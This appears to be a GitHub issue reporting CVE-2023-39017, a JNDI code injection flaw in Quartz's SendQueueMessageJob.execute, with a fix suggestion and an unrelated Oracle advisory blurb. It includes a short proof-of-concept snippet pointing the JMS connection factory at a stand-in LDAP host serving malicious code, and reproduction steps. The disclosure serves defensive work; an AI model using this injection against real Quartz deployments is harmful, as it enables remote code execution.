Headline
CVE-2023-39017: There's a code injection vulnerability of `org.quartz.jobs.ee.jms.SendQueueMessageJob.execute` · Issue #943 · quartz-scheduler/quartz
quartz-jobs 2.3.2 and below was discovered to contain a code injection vulnerability in the component org.quartz.jobs.ee.jms.SendQueueMessageJob.execute. This vulnerability is exploited via passing an unchecked argument.
Affected Version
The latest version 2.3.2 and below.
Describe the vulnerability
There is a method, org.quartz.jobs.ee.jms.SendQueueMessageJob.execute(JobExecutionContext), designed to send a jms message. However, passing an unchecked argument to this API can lead to the execution of arbitrary commands. For instance, following codes can lead to the execution of arbitrary commands from attackers:
JobExecutionContext context = new JobExecutionContext() {
......
@Override
public JobDataMap getMergedJobDataMap() {
JobDataMap map = new JobDataMap();
map.put("jms.connection.factory", "ldap://example.com/Evil");
return map;
}
......
};
SendQueueMessageJob job = new SendQueueMessageJob();
job.execute(context);
To Reproduce
First, establish an LDAP server and provide malicious code. Then, just execute above codes would reproduce it.
Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.
Related news
Vulnerability in the Sun ZFS Storage Appliance product of Oracle Systems (component: Core). The supported version that is affected is 8.8.60. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Sun ZFS Storage Appliance. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Sun ZFS Storage Appliance. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).